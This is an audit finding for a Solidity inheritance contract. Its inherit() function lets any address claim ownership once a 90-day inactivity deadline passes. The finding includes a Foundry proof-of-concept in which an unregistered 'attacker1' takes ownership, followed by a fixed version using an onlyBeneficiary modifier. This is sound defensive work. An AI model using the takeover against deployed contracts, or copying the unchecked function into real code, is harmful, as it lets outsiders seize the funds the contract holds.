Beginner Friendly / Solidity
Submission Details
Severity: high
Valid

Anyone can take ownership of smart contract

Summary

Once the 90-day inactivity deadline has passed, any address can call the `inherit` function and take ownership of the smart contract.

Vulnerability Details

The `inherit` function has no check on who the caller is. Once the 90-day inactivity deadline has passed, if `beneficiaries.length` is equal to 1, any address can call `inherit` and be assigned as `owner` of the smart contract.

    function inherit() external { // @audit-info Anyone can call 'inherit'
        if (block.timestamp < getDeadline()) {
            revert InactivityPeriodNotLongEnough();
        }
        if (beneficiaries.length == 1) {
            owner = msg.sender; // @audit-issue [HIGH] - Anyone can take ownership of smart contract
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }

POC

    // Foundry test: the owner registers a single beneficiary, the 90-day
    // deadline passes, and an unrelated address calls inherit() and becomes owner.
    function testPOC() public {
        address attacker1 = makeAddr("attacker1");
        vm.warp(1);
        vm.startPrank(owner);
        im.addBeneficiery(user1); // exactly one beneficiary registered
        vm.stopPrank();
        vm.warp(1 + 90 days); // move past the inactivity deadline
        vm.startPrank(attacker1);
        im.inherit(); // attacker1 is not a beneficiary, yet the call succeeds
        assertEq(attacker1, im.getOwner());
        vm.stopPrank();
    }

Impact

Any address can take total control of the smart contract, putting all funds held by it at risk.

Tool Used

Manual Review

Recommendations

Consider adding a modifier that checks whether `msg.sender` is a registered beneficiary, and apply it to `inherit` so that only beneficiaries are able to call it.
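The following is an added example, not the audited project's code, of how the recommended fix could look. It keeps the `inherit` logic from the finding unchanged and adds an `onlyBeneficiary` modifier backed by a membership mapping. The contract name, the `isBeneficiary` mapping, the `NotABeneficiary` and `NotOwner` errors, `addBeneficiary` and the `TIMELOCK` constant are assumptions; `inherit`, `beneficiaries`, `owner`, `isInherited`, `getDeadline`, `_setDeadline` and the two original error names are taken from the finding.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example (not the audited project's code): a minimal contract that keeps
// the 90-day inactivity logic from the finding but restricts `inherit` to
// registered beneficiaries. Names not present in the finding are assumptions.
contract InheritanceExample {
    error InactivityPeriodNotLongEnough();
    error InvalidBeneficiaries();
    error NotABeneficiary(); // assumed
    error NotOwner();        // assumed

    uint256 public constant TIMELOCK = 90 days; // assumed name for the 90-day period

    address public owner;
    address[] public beneficiaries;
    mapping(address => bool) private isBeneficiary; // assumed membership index
    bool public isInherited;
    uint256 private deadline;

    constructor() {
        owner = msg.sender;
        _setDeadline();
    }

    modifier onlyOwner() {
        if (msg.sender != owner) revert NotOwner();
        _;
    }

    // The recommended check: the caller must be a registered beneficiary.
    // Using a mapping keeps the check O(1) instead of looping over the array.
    modifier onlyBeneficiary() {
        if (!isBeneficiary[msg.sender]) revert NotABeneficiary();
        _;
    }

    // Assumed owner-only registration; mirrors the role of the project's
    // addBeneficiery call in the PoC.
    function addBeneficiary(address account) external onlyOwner {
        if (isBeneficiary[account]) return; // idempotent, avoid duplicates
        isBeneficiary[account] = true;
        beneficiaries.push(account);
        _setDeadline(); // owner activity resets the inactivity timer
    }

    function getDeadline() public view returns (uint256) {
        return deadline;
    }

    // Before the fix this function was `external` with no caller check, so any
    // address could become owner once the deadline passed and exactly one
    // beneficiary existed. With `onlyBeneficiary`, msg.sender is guaranteed to be
    // in `beneficiaries`, which also makes the final `else` branch unreachable;
    // it is kept for parity with the audited function.
    function inherit() external onlyBeneficiary {
        if (block.timestamp < getDeadline()) {
            revert InactivityPeriodNotLongEnough();
        }
        if (beneficiaries.length == 1) {
            owner = msg.sender;
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }

    function _setDeadline() internal {
        deadline = block.timestamp + TIMELOCK;
    }
}
```

With this change the PoC above no longer passes: `attacker1` was never registered, so `im.inherit()` reverts with `NotABeneficiary` before the ownership branch is reached, and a Foundry test would assert that with `vm.expectRevert`. Keeping the mapping in sync with the array (adding and, if the project supports it, removing beneficiaries in both places) is the one invariant the fix relies on.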

Updates

Lead Judging Commences

0xtimefliez Lead Judge 6 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Inherit depends on msg.sender so anyone can claim the contract
